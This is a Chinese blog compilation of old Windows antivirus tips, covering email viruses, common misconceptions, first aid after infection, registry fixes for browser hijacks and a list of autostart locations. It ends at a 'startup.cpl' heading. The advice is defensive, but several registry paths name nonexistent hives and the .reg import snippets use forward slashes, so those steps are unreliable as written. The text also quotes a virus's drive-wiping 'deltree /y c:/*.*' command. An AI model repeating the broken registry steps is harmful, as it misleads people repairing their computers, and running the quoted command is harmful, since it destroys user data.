常见病毒查杀与防御技巧(from:http://www.ccoo.cn/blog/blogshow.asp?aid=184498)

有人认为杀毒是一件简单的事情,不就是点击杀毒软件的“杀毒”按钮就行了吗?

   不错,杀毒的确要借助杀毒软件,但是不是说一点击杀毒就万事大吉的。这就是为什么有的人一次性就将病毒杀尽,有的人机子内的病毒永远也杀不完的原因了。杀毒也要讲技巧!

   对于杀毒的设置本文就不做介绍了。

   杀毒要讲环境。其实说真的,杀毒最好的环境就是用干净引导盘启动的DOS。但是如果每次出现病毒都到DOS下杀是不科学的!即费时间,有减少DOS杀毒盘的寿命。那么,该怎么判断该在什么环境下杀毒呢?

  一、被激活的非系统文件内的病毒

   杀这种病毒很简单,只需要在一般的Windows环境下杀就行了。一般都能将其歼灭。

  二、已经被激活或发作的非系统文件内的病毒

   如果在一般Windows环境下杀毒,效果可能会大打折扣。虽然,现在的反病毒软件都能查杀内存病毒,但是此技术毕竟还未成熟,不一定能歼灭病毒。

   因此,杀此类病毒应在Windows安全模式下进行。在Windows安全模式下,这些病毒都不会在启动时被激活。因此,我们就能放心的杀毒了。

  三、系统文件内病毒

   这类病毒比较难缠,所以在操作前请先备份。杀此类病毒一定要在干净的DOS环境下进行。有时候还要反复查杀才能彻底清除。

  四、网络病毒(特别是通过局域网传播的病毒)

   此类病毒必须在断网的情况下才能清除,而且清除后很容易重新被感染!要根除此类病毒必需靠网络管理员的努力了!

  五、感染杀毒厂家有提供专用杀毒工具的病毒

   杀灭此类病毒好办,只需下载免费的专用杀毒工具就行了。专用杀毒工具杀毒精确性相对较高,因此我推荐在条件许可的情况下使用专用杀毒工具。

杀毒很讲究技巧,所以,选择适合自己的反病毒软件和时刻开启监控很重要,还有千万别忘了升级哦!

杀毒技巧系列--坚决把 “邮件病毒” 消灭


邮件病毒”其实和普通的电脑病毒一样,只不过由于它们的传播途径主要是通过电子邮件,所以才被称为“邮件病毒”,它们一般是通过邮件中“附件”夹带的方法进行扩散。现在就告诉大家把“邮件病毒”消灭在邮箱之中应用八招。
  1、选择一款正版的防毒软件。借杀毒软件中的邮件监视功能,在邮件接收过程中对其进行病毒扫描过滤
  2、及时升级病毒库。病毒软件厂商天天都会更新病毒库,提供的升级服务是非常周到,如果用户不及时升级,就很难对新病毒进行查杀。
3、打开实时监控防火墙。防火墙最重要的功能就是邮件监视功能。
4、不要轻易打开陌生人的邮件附件,如果发现邮件中无内容,无附件,邮件自身的大小又有几十K或者更大,那么此邮件中极有可能包含有病毒;如果附件为可执行文件(.exe、.com)或word文档时,要选择用杀毒软件的扫描查毒察看;如果发现收到的邮件对方地址非常陌生,域名对极不像正常的国内邮箱,那就很有可能是收到病毒了;如果是双后缀那么极有可能是病毒,因为邮件病毒会选择隐藏在附件中,直接册除即可。
5、尽量不在“地址薄”中设置联系名单。因为一但被病毒感染,病毒会通过邮件“地址薄”中的联系人来传播。
6、少使用信纸模块。信纸模块都是一些脚本文件,如果模块感染了脚本病毒例如VBS/KJ、欢乐时光等,那用户使用信纸发出去的邮件都带有病毒了。
7、设置邮箱自动过滤功能。这样不仅能够防止垃圾邮件,还可以过滤掉一些带病毒邮件。
8、不使用邮件软件邮箱中的HTML预览功能。当今,一些传播与破坏力比较大的病毒,往往都是通过邮件预览时进行感染,并不需要打开邮件。

 

杀毒技巧系列--计算机防毒杀毒的六大常见误区


实用,详细


计算机防毒杀毒的六大常见误区


  误区1:有了杀毒软件我就可以什么毒都不怕

  真的有了杀毒软件就什么毒也不怕吗?答案肯定不行的,

  病毒是不断有新的出现的,而且它的出现往往无法预料,杀毒软件也要不断更新,要不断升级才能对付新出现的病毒,即使这样,有很多时候杀毒软件升级到最新也不能杀掉全部的病毒,升级到最新,只是能让您的电脑拒绝更多的病毒,让您的电脑处于更安全的状态,并不意味着您就可以忽略电脑安全,平时还是要注意共享安全;不要下载不明程序,不要打开不明网页等等。

  误区2:装杀毒软件越多越好

  前两天,笔者帮朋友装机,朋友不懂电脑,所以对我说:“装多几个杀毒软件吧,我怕上网很多毒。”晕倒?¥%?#……,真的装杀毒软件越多越好吗?其实不同厂商开发的杀毒软件很容易引起冲突。不少杀毒厂商为了避免这种情况的发生,在安装的时候就检测电脑中是否安装有其他杀毒软件,目的就是为了避免两个杀毒软件同时使用的时候出现的冲突。而且,对于大部分的病毒,一般一个杀毒软件都可以杀掉,对付特殊病毒也有不少专杀工具。装的杀毒软件越多,除了可能出现冲突以外,还会消耗更多的系统资源,减慢电脑运行速度。装多几个杀毒软件,得益却没什么,失去效能就可能很大。所以,并不是杀毒软件越多越好。

  误区3:杀毒软件能杀毒就行了

  杀毒软件能杀毒就行?是不是等到病毒入侵然后才来杀毒?有些人 b了杀毒软件,想减小系统资源的消耗,会把杀毒软件关掉,当病毒入侵时候才用杀毒软件来杀毒。这种意识是不行的,现在病毒风行,可以无孔不入,一不小心,您就会很容易“中毒”,况且现在硬盘之大,令很多杀毒软件杀毒时间都很长;而且假如病毒入侵的时候才杀毒,那么可能您的系统早已崩溃,数据早已丢失,为时已晚,到时候损失就大了。因此,杀毒不是重点,防才是最重要。与其说是杀毒软件,不如说是防毒软件更好!

  误区4:只要我不上网就不会有病毒

  有些人的电脑连接到因特网,以为只要不打开网页上网就不会感染病毒,所以想不打开杀毒软件防毒。其实,虽然不少病毒是通过网页传播的,但是也有不少病毒不等您打开网页早已入侵您的机器,这个是必须防范的。冲击波,蠕虫病毒等等都会在您不知不觉中进入电脑。而且,盗版的光盘,软盘也会存在病毒。因此,只要您的电脑开着,最好就防着!

  误区5:文件设置只读就可以避免病毒

  设置只读,只是调用系统几个命令而已,而病毒也可以调用系统命令。因此,可以病毒可以改掉文件属性,严重的可以删掉重要文件,格式化硬盘,让系统崩溃!因此,设置只读,并不能有效防毒,不过对于局域网中为了共享安全,防止误删除,设置只读属性还是比较有用的。

  误区6:病毒不感染数据文件

  有人觉得,病毒是一段程序,而数据文件如.txt、.pcx等格式文件一般不会包含程序,因此不会感染病毒。殊不知像word、excel等数据文件由于包含了可执行码却会被病毒感染,而且,有些病毒可以让硬盘里面的文件全部格式化掉,因此,我们不能忽视数据文件的备份。

  上面只介绍了常见的防毒杀毒误区,还有一些其它的误区,在我们使用电脑的时候都可能慢慢碰到的。在我们使用电脑的时候,最重要还是防毒,而能做好防毒,那就需要不断更新您的杀毒软件,同时注意打上系统地升级补丁。

 

对付计算机病毒的酷招秘技


1.一个好,两个妙

  无论是菜鸟还是飞鸟,杀毒软件和网络防火墙都是必需的。上网前或启动机器后马上运行这些软件,就好像给你的机器“穿”上了一层厚厚的“保护衣”,就算不能完全杜绝网络病毒的袭击,起码也能把大部分的网络病毒“拒之门外”。目前杀毒软件非常多,功能也十分接近,大家可以根据需要去购买正版的(都不算贵),也可以在网上下载免费的共享杀毒软件(网上有不少哦),但千万不要使用一些破解的杀毒软件,以免因小失大。安装软件后,要坚持定期更新病毒库和杀毒程序,以最大限度地发挥出软件应有的功效,给计算机“铁桶”般的保护。

  2.下载文件仔细查

  网络病毒之所以得以泛滥,很大程度上跟人们的惰性和侥幸心理有关。当你下载文件后,最好立即用杀毒软件扫描一遍,不要怕麻烦,尤其是对于一些Flash、MP3、文本文件同样不能掉以轻心,因为现在已经有病毒可以藏身在这些容易被大家忽视的文件中了。

  3.拒绝不良诱惑

  很多中了网页病毒的朋友,都是因为访问不良站点惹的祸,因此,不去浏览这类网页会让你省心不少。另外,当你在论坛、聊天室等地方看到有推荐浏览某个URL时,要千万小心,以免不幸“遇害”,或者尝试使用以下步骤加以防范:

  1)打开杀毒软件和网络防火墙;

  2)把Internet选项的安全级别设为“高”;

  3)尽量使用以IE为内核的浏览器(如MyIE2),然后在MyIE2中新建一个空白标签,并关闭Script、javaApple、ActiveX功能后再输入URL。

  小提示:该方法不但能有效对付网页病毒,而且对“蠕虫病毒”也有一定作用。

4.免费午餐:在线查毒

  虽然目前网络上的“免费午餐”越来越少,但仍有一些网站坚持向网民们提供免费的在线查毒服务,实在是值得表扬哦。对于没有安装查毒软件、又担心会“中招”的朋友,可以利用在线查毒服务为自己的“爱姬”来一个全身“扫描”:

  千禧在线:www.china-yk.com/tsfw/

  趋势科技:www.trendmicro.com.cn/housecall/start_corp.htm

  武汉热线:tech.wuhan.net.cn/scan/

  瑞星在线:online.rising.com.cn/

  263在线查毒:gz.263.com/zxsd.htm

  McAfee在线杀毒:www.mcafee.com/myapps/clinic/vso/

  小提示:1)各网站的在线查毒服务都有所不同,使用前要仔细阅读网站上的相关说明后再进行操作,争取把病毒赶尽杀绝;

  2)由于查毒时需要调用浏览器的ActiveX控件,因此查毒前要先在IE的“Internet选项”\“安全”页面中检查该功能是否打开,并相应降低安全级别(一般“中等”即可)再查毒。

  5.千呼万唤终不应

  如果你发现有“你中奖啦!”、“打开附件会有意外惊喜哦!”这些话,可千万别信!看到类似广告的邮件标题,最好马上把它删掉。对于形迹可疑的邮件(特别是HTML格式),不要随便打开,如果是你熟悉的朋友发来的,可以先与对方核实后再作处理。同时,也有必要采取一定措施来预防邮件病毒:

  1)尽量不要用Outlook作为你的邮件客户端,改以Foxmail等代替,同时以文本方式书写和阅读邮件,这样就不用担心潜伏在HTML中的病毒了;

  2)多使用远程邮箱功能,利用远程邮箱的预览功能(查看邮件Header和部分正文),可以及时找出垃圾邮件和可疑邮件,从而把病毒邮件直接从服务器上赶走;

  3)不要在Web邮箱中直接阅读可疑邮件,因为这种阅读方法与浏览网页的原理一样,需要执行一些脚本或Applet才能显示信息,有一定危险性。
 6.修修补补,填充漏洞

  当前各种各样的安全漏洞给网络病毒开了方便之门(其中以IE和PHP脚本语言的漏洞最多),我们平时除了注意及时对系统软件和网络软件进行必要升级外,还要尽快为各种漏洞打上最新的补丁。其中一个检测漏洞的简易方法就是直接使用系统中自带的“Windows Update”功能,让微软为你的电脑来一次“全身检查”并打上安全补丁。当然也可以使用其他软件对计算机进行安全检测(例如东方卫士的“系统漏洞检测精灵”就是一个不错的软件),以便及早发现漏洞。

  7.给危险文件加把“锁”

  不管网络病毒如何“神通广大”,它要对计算机进行破坏,总是要调用系统文件的执行程序(例如format.exe、delete.exe、deltree.exe等),根据这个特点,我们可以对这些危险文件采用改名、更改后缀、更换存放目录、用软件进行加密保护等多种方法进行防范,让病毒无从下手。

  8.有“备”无患,打造最后防线

  正所谓“智者千虑,必有一失”,为保证计算机内重要数据的安全,定时备份少不了。如果我们能做好备份工作,即使遭受网络病毒的全面破坏,也能把损失减至最小。当然,前提条件是必须保证备份前数据没被感染病毒,否则只能是徒劳无功。另外,要尽量把备份文件刻录到光盘上或存放到隐藏分区中,以免“全军覆没”。

  二、见招拆招——杀毒软件的常见问题

  安装杀毒软件后与其他软件发生冲突怎么办?

  1)由于多数杀毒软件和防火墙在默认设置中都是开机后自动运行的,因此当发生软件冲突时先检查是否开启了杀毒软件和防火墙,然后尝试暂时关闭杀毒软件和防火墙的监测功能,再看看问题是否已经解决;

  2)到杀毒软件的主页网站看看是否出了相关补丁或升级版本,有则打上补丁或升级到最新版本;

  3)如果以上措施还不能解决问题,可以通过E-mail联系作者,寻求解决方法。
不能正常升级怎么办?

  1)如果使用的是正版软件,可以先试着完全卸载旧版本,再安装新版本(为安全起见,建议卸载前先进行备份);

  2)检查是否安装了多种杀毒软件,卸载其他杀毒软件后再安装;

  3)检查输入的序列号是否正确、钥匙盘(A盘)有没有损坏,有问题的请与经销商联系解决;

  4)尝试以下操作方法:清空Temp文件夹→关闭打开的杀毒软件→换路径重新安装→把安装光盘中的安装目录拷贝到硬盘上,然后运行目录里的“Setup.exe”。
 无法清除病毒怎么办?

  1)先升级病毒库再杀毒;

  2)用一张干净的系统引导盘启动机器后,在DOS状态下进行杀毒;

  3)备份染毒文件并隔离,然后把病毒样本寄给作者,得到新病毒库后再杀毒。

  三、亡羊补牢——病毒发作后的急救措施

  虽然已经做足了防范措施,但正所谓:“天有不测之风云”,万一中招了,我们还有什么急救措施呢?

  1.软件方面

  1)首先断开全部网络连接,以免病毒向其他在线电脑传播,然后马上用杀毒软件进行扫描杀毒工作(记得要先扫描内存、引导区);

  2)赶快备份和转移重要文档到安全地方(软盘、光盘),记录账号、密码等资料,等病毒清除完毕后再作处理;

  3)平时曾用GHOST备份的,可以利用映像文件来恢复系统,这样不但能马上恢复工作,而且连同所有病毒也一并清除了,当然,这要求你的GHOST备份是没有感染病毒的。另外,恢复系统前同样要先做好备份重要资料的工作。

  4)没有进行GHOST备份,并且机器中数据并不重要的,可以用干净的引导盘启动机器后格式化硬盘,然后再重新安装系统和程序。

  2.硬件方面

  1)BIOS或CMOS被破坏的,需要找寻相同类型的主板,然后用热插拔的方法进行恢复。此方法存在着极大的危险性,最好找专业技术人员代你进行恢复。

  2)硬盘引导区或主引导扇区被破坏的,可以尝试用KV杀毒王、金山毒霸等硬盘修复工具进行修复。

  做好了上面这些防范和应对措施,网络病毒再也别想骚扰到你,冲浪当然更安全了!

杀毒技巧系列--恶意网页病毒十三种症状分析及简单修复方法


恶意网页病毒十三种症状分析及简单修复方法

 

一、对IE浏览器产生破坏的网页病毒:
  
  (一).默认主页被修改
  
  1.破坏特性:默认主页被自动改为某网站的网址。
  
  2.表现形式:浏览器的默认主页被自动设为如********.COM的网址。
  
  3.清除方法:采用手动修改注册表法,开始菜单->运行->regedit->确定,打开注册表编辑工具,按顺序依次打开:HKEY_LOCAL_USER/Software/Microsoft/Internet Explorer/Main 分支,找到Default_Page_URL键值名(用来设置默认主页),在右窗口点击右键进行修改即可。按F5键刷新生效。
  
  危害程度:一般

(二).默认首页被修改
  
  1.破坏特性:默认首页被自动改为某网站的网址。
  
  2.表现形式:浏览器的默认主页被自动设为如********.COM的网址。
  
  3.清除方法:采用手动修改注册表法,开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_LOCAL_USER/Software/Microsoft/Internet Explorer/Main分支,找到StartPage键值名(用来设置默认首页),在右窗口点击右键进行修改即可。按F5键刷新生效。
  
  危害程度:一般
  
  (三).默认的微软主页被修改
  
  1.破坏特性:默认微软主页被自动改为某网站的网址。
  
  2.表现形式:默认微软主页被篡改。
  
  3.清除方法:
  
  (1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_LOCAL_MACHINE/Software/Microsoft/InternetExplorer/Main 分支,找到Default_Page_URL键值名(用来设置默认微软主页),在右窗口点击右键,将键值修改为 http://www.microsoft.com/windows/ie_intl/cn/start/ 即可。按F5键刷新生效。
  
  (2)自动文件导入注册表法:请把以下内容输入或粘贴复制到记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。
  
  REGEDIT4
  
  [HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Main]
  "default_page_url"="http://www.microsoft.com/windows/ie_intl/cn/start/"
  
  危害程度:一般
  
  (四).主页设置被屏蔽锁定,且设置选项无效不可更改
  
  1.破坏特性:主页设置被禁用。
  
  2.表现形式:主页地址栏变灰色被屏蔽。
 
  3.清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_CURRENT_USER/Software/Microsoft/InternetExplorer/分支,新建“ControlPanel”主键,然后在此主键下新建键值名为“HomePage”的DWORD值,值为“00000000”,按F5键刷新生效。
  
  (2)自动文件导入注册表法:请把以下内容输入或粘贴复制到记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。
  
  REGEDIT4
  
  [HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Control Panel]
  "HomePage"=dword:00000000
  
  危害程度:轻度
  
  (五).默认的IE搜索引擎被修改
  
  1.破坏特性:将IE的默认微软搜索引擎更改。
  
  2.表现形式:搜索引擎被篡改。
  
  3.清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,第一,按如下顺序依次打开:HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Search分支,找到“SearchAssistant”键值名,在右面窗口点击“修改”,即可对其键值进行输入为: http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm ,然后再找到“CustomizeSearch”键值名,将其键值修改为: http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm ,按F5键刷新生效。
  
  (2)自动文件导入注册表法:请把以下内容输入或粘贴复制到记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。
  
  REGEDIT4
  
  [HKEY_LOCAL_MACHINE/Software/Microsoft/InternetExplorer/Search]
  "SearchAssistant"="http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm"
  "CustomizeSearch"="http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm"
  
  危害程度:一般
  
  (六).IE标题栏被添加非法信息
  1.破坏特性:通过修改注册表,使IE标题栏被强行添加宣传网站的广告信息。
  
  2.表现形式:在IE顶端蓝色标题栏上多出了一些不知名网站信息。
  
  3.清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,第一,按如下顺序依次打开:HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main分支,找到“Window Title”键值名,输入键值为Microsoft Internet Explorer,按F5刷新。
  
  第二,按如下顺序依次打开:HKEY_CURRENT_MACHINE/Software/Microsoft/InternetExplorer/Main分支,找到“Window Title”键值名,输入键值为Microsoft Internet Explorer,按F5刷新生效。
  
  (2)自动文件导入注册表法:请把以下内容输入或粘贴复制到记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。
  
  REGEDIT4
  
  [HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main]
  "Window Title"="Microsoft Internet Explorer"
  
  [HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Main]
  "Window Title"="Microsoft Internet Explorer"
  
  危害程度:一般
  
  (七).OE标题栏被添加非法信息破坏特性:
  
  破坏特性:通过修改注册表,在微软的集成电子邮件程序Microsoft Outlook顶端标题栏添加宣传网站的广告信息br]
  表现形式:在顶端的Outlook Express蓝色标题栏添加非法信息。
  
  清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_LOCAL_USER/Software/Microsoft/Outlook Express分支,找到WindowTitle以及Store Root键值名,将其键值均设为空。按F5键刷新生效。
  
  (2)自动文件导入注册表法:请把以下内容输入或粘贴复制到记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。
  
  REGEDIT4
  
  [HKEY_CURRENT_USER/Software/Microsoft/Outlook Express]
  "WindowTitle"=""
  "Store Root"=""
  
  危害程度:一般
  
  (八).鼠标右键菜单被添加非法网站链接:
  
  1.破坏特性:通过修改注册表,在鼠标右键弹出菜单里被添加非法站点的链接。
  
  2.表现形式:添加“网址之家”等诸如此类的链接信息。
  
  3.清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/MenuExt分支,在左边窗口凡是属于非法链接的主键一律删除,按F5键刷新生效。
  
  4.危害程度:一般
  
  (九).鼠标右键弹出菜单功能被禁用失常:
  
  1.破坏特性:通过修改注册表,鼠标右键弹出菜单功能在IE浏览器中被完全禁止。
  
  2.表现形式:在IE中点击右键毫无反应。
  
  3.清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Restrictions分支,找到“NoBrowserContextMenu”键值名,将其键值设为“00000000”,按F5键刷新生效。
  
  (2)自动文件导入注册表法:请把以下内容输入或粘贴复制到记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。
  
  REGEDIT4
  
  [HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Restrictions]
  "NoBrowserContextMenu"=dword:00000000
  
  危害程度:轻度
  
  (十).IE收藏夹被强行添加非法网站的地址链接
  
  破坏特性:通过修改注册表,强行在IE收藏夹内自动添加非法网站的链接信息。
  
  表现形式:躲藏在收藏夹下。
  
  清除方法:请用手动直接清除,用鼠标右键移动至该非法网站信息上,点击右键弹出菜单,选择删除即可。
  
  危害程度:一般
  
  (十一).在IE工具栏非法添加按钮
  
  破坏特性:工具栏处添加非法按钮。
  
  表现形式:有按钮图标。
  
  清除方法:直接点击鼠标右键弹出菜单,选择“删除”即可。
  
  危害程度:一般
  
  (十二).锁定地址栏的下拉菜单及其添加文字信息
  
  破坏特性:通过修改注册表,将地址栏的下拉菜单锁定变为灰色。
  
  表现形式:不仅使下拉菜单消失,而且在其上覆盖非法文字信息。
  
  清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Toolbar分支,在右边窗口找到“LinksFolderName”键值名,将其键值设为“链接”,多余的字符一律去掉,按F5键刷新生效。
  
  危害程度:轻度
  
  (十三).IE菜单“查看”下的“源文件”项被禁用
  
  破坏特性:通过修改注册表,将IE菜单“查看”下的“源文件”项锁定变为灰色。
  
  表现形式:“源文件”项不可用。
  
  清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,第一,按如下顺序依次打开:HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Restrictions分支,找到"NoViewSource"键值名,将其键值设为“00000000”,按F5键刷新生效。
  
  按如下顺序依次打开:HKEY_LOCAL_MACHINE/Software/Policies/Microsoft/Internet Explorer/Restrictions分支,找到"NoViewSource"键值名,将其键值设为“00000000”,按F5键刷新生效。
  
  (2)自动文件导入注册表法:请把以下内容输入或粘贴复制到记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。
  
  REGEDIT4
  
  [HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Restrictions]
  "NoViewSource"=dword:00000000
  
  [HKEY_LOCAL_MACHINE/Software/Policies/Microsoft/Internet Explorer/Restrictions]
  "NoViewSource"=dword:00000000
  
  危害程度:轻度


如何查杀自启动程序

一、经典的启动——“启动”文件夹
  单击“开始→程序”,你会发现一个“启动”菜单,这就是最经典的Windows启动位置,右击“启动”菜单选择“打开”即可将其打开,如所示,其中的程序和快捷方式都会在系统启动时自动运行。最常见的启动位置如下:
  当前用户:<C:/Documents and Settings/用户名/「开始」菜单/程序/启动>
  所有用户:<C:/Documents and Settings/All Users/「开始」菜单/程序/启动>

  

二、有名的启动——注册表启动项
  注册表是启动程序藏身之处最多的地方,主要有以下几项:
  1.Run键
  Run键是病毒最青睐的自启动之所,该键位置是[HKEY_CURRENT_
USER/Software/Microsoft/Windows/CurrentVersion/Run]和[HKEY_
LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run],其下的所有程序在每次启动登录时都会按顺序自动执行。
  还有一个不被注意的Run键,位于注册表[HKEY_CURRENT_
USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/Run]和[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/
Policies/Explorer/Run],也要仔细查看。
  2.RunOnce键
  RunOnce位于[HKEY_CURRENT_USER/Software/Microsoft/Windows/
CurrentVersion/RunOnce]和[HKEY_LOCAL_MACHINE/Software/Microsoft/
Windows/CurrentVersion/RunOnce]键,与Run不同的是,RunOnce下的程序仅会被自动执行一次。
  3.RunServicesOnce键
  RunServicesOnce键位于[HKEY_CURRENT_USER/Software/Microsoft/
Windows/CurrentVersion/RunServicesOnce]和[HKEY_LOCAL_MACHINE/
Software/Microsoft/Windows/CurrentVersion/RunServicesOnce]下,其中的程序会在系统加载时自动启动执行一次。
  4.RunServices键
  RunServices继RunServicesOnce之后启动的程序,位于注册表[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/RunServices]和[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/
RunServices]键。
  5.RunOnceEx键
  该键是Windows XP/2003特有的自启动注册表项,位于[HKEY_
CURRENT_USER//SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnceEx]和[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnceEx]。
  6.load键
  [HKEY_CURRENT_USER/Software/Microsoft/WindowsNT/CurrentVersion/Windows]下的load键值的程序也可以自启动。
  7.Winlogon键
  该键位于位于注册表[HKEY_CURRENT_USER/SOFTWARE/
Microsoft/Windows NT/CurrentVersion/Winlogon]和[HKEY_LOCAL_MACHINE/
SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon],注意下面的Notify、Userinit、Shell键值也会有自启动的程序,而且其键值可以用逗号分隔,从而实现登录的时候启动多个程序。
  8.其他注册表位置
  还有一些其他键值,经常会有一些程序在这里自动运行,如:[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System/Shell]
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/ShellServiceObjectDelayLoad]
[HKEY_CURRENT_USER/Software/Policies/Microsoft/Windows/System/Scripts]
[HKEY_LOCAL_MACHINE/Software/Policies/Microsoft/Windows/System/Scripts]

  小提示

  注册表的[HKEY_LOCAL_MACHINE]和[HKEY_CURRENT_USER]键的区别:前者对所有用户有效,后者只对当前用户有效。
  三、古老的启动——自动批处理文件
  从DOS时代过来的朋友肯定知道autoexec.bat(位于系统盘根目录)这个自动批处理文件,它会在电脑启动时自动运行,早期许多病毒就看中了它,使用deltree、format等危险命令来破坏硬盘数据。如“C盘杀手”就是用一句“deltree /y c:/*.*”命令,让电脑一启动就自动删除C盘所有文件,害人无数。

  小提示

  ★在Windows 98中,Autoexec.bat还有一个哥们——Winstart.bat文件,winstart.bat位于Windows文件夹,也会在启动时自动执行。
  ★在Windows Me/2000/XP中,上述两个批处理文件默认都不会被执行。
  四、常用的启动——系统配置文件
  在Windows的配置文件(包括Win.ini、System.ini和wininit.ini文件)也会加载一些自动运行的程序。
  1.Win.ini文件
  使用“记事本”打开Win.ini文件,在[windows]段下的“Run=”和“LOAD=”语句后面就可以直接加可执行程序,只要程序名称及路径写在“=”后面即可。

  小提示

  “load=”后面的程序在自启动后最小化运行,而“run=”后程序则会正常运行。
  2.System.ini文件
  使用“记事本”打开System.ini文件,找到[boot]段下“shell=”语句,该语句默认为“shell=Explorer.exe”,启动的时候运行Windows外壳程序explorer.exe。病毒可不客气,如“妖之吻”病毒干脆把它改成“shell=c:/yzw.exe”,如果你强行删除“妖之吻”病毒程序yzw.exe,Windows就会提示报错,让你重装Windows,吓人不?也有客气一点的病毒,如将该句变成“shell=Explorer.exe 其他程序名”,看到这样的情况,后面的其他程序名一定是病毒程序如所示。
  3.wininit.ini
  wininit.ini文件是很容易被许多电脑用户忽视的系统配置文件,因为该文件在Windows启动时自动执后会被自动删除,这就是说该文件中的命令只会自动执行一次。该配置文件主要由软件的安装程序生成,对那些在Windows图形界面启动后就不能进行删除、更新和重命名的文件进行操作。若其被病毒写上危险命令,那么后果与“C盘杀手”无异。

  小提示

  ★如果不知道它们存放的位置,按F3键打开“搜索”对话框进行搜索;
  ★单击“开始→运行”,输入sysedit回车,打开“系统配置编辑程序”,如图2所示,在这里也可以方便的对上述文件进行查看与修改。

  

五、智能的启动——开/关机/登录/注销脚本
  在Windows 2000/XP中,单击“开始→运行”,输入gpedit.msc回车可以打开“组策略编辑器”,在左侧窗格展开“本地计算机策略→用户配置→管理模板→系统→登录”,然后在右窗格中双击“在用户登录时运行这些程序”,单击“显示”按钮,在“登录时运行的项目”下就显示了自启动的程序。

 

  

六、定时的启动——任务计划
  在默认情况下,“任务计划”程序随Windows一起启动并在后台运行。如果把某个程序添加到计划任务文件夹,并将计划任务设置为“系统启动时”或“登录时”,这样也可以实现程序自启动。通过“计划任务”加载的程序一般会在任务栏系统托盘区里有它们的图标。大家也可以双击“控制面板”中的“计划任务”图标查看其中的项目。

  小提示

  “任务计划”也是一个特殊的系统文件夹,单击“开始→程序→附件→系统工具→任务计划”即可打开该文件夹,从而方便进行查看和管理。

  七、跟着别人的启动——随软件开启的程序
  随MyIE2启动的程序,详见本刊2004年第3期、4期《让你受用终生的浏览器─MyIE2实用技巧大放送》一文。

下篇 全方位作战
 
    彻底清查Windows自启动
  一、从“系统信息”查看启动程序
  单击“开始→程序→附件→系统工具→系统信息”,双击“软件环境”,单击“启动程序”,在右边窗口出现的程序就是所有自启动程序,在“装载源”或“位置”下显出该程序是由注册表还是“启动”文件夹启动的。从这里只能查看自启动程序,不能对自启动程序进行禁止自启动等任何更改操作。
软件性质: Windows自身功能
推荐指数: ★★★★

 

  

二、MSConfig
  在Windows 98/Me/XP/2003中,单击“开始→运行”,输入msconfig回车即可打开“系统配置实用程序”窗口,单击“启动”标签,在列表框中显示的就是从注册表、“启动”文件夹和系统配置文件中自启动的程序。程序前有对号的是允许自启动的程序,没有对号的则不会自启动。如果想取消某个程序的自启动,单击取消程序前的对勾即可。还可以在autoexec.bat、system.ini和win.ini标签里面对它们进行编辑,取消其中的自启动程序。

  小提示

  ★所有的修改都需要重新启动才能生效。
  ★Windows 2000没有msconfig程序,但是我们可以从Windows 98或者XP拷贝一个到system32目录,同样可以起作用。
软件性质: 免费,微软原装
推荐指数: ★★★★


  三、startup.cpl
